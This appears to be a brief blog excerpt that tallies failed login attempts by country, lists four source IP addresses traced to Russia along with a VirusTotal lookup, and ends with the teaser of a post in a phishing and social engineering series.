Occurances
Country
511
China
149
Australia
6
Vietnam
4
Russia
3
South Korea
3
Thailand


I noticed that most of the occurrences of failed login attempts are from China, again no attribution to them or any other country listed.

I was curious which of the IP Addresses came from the country of Russia:
31.184.194.115
78.109.142.184
122.225.38.23
195.94.234.86

The only IP with a little history on virustotal.com is 195.94.234.86 but no trace to malicious files have occurred at this time.



Prepare, Bait, Hook, Execute and Control - Buffer Overflows

This post is the third of four that I am planning to write about social engineering specifically about phishing.  The form of phishing that...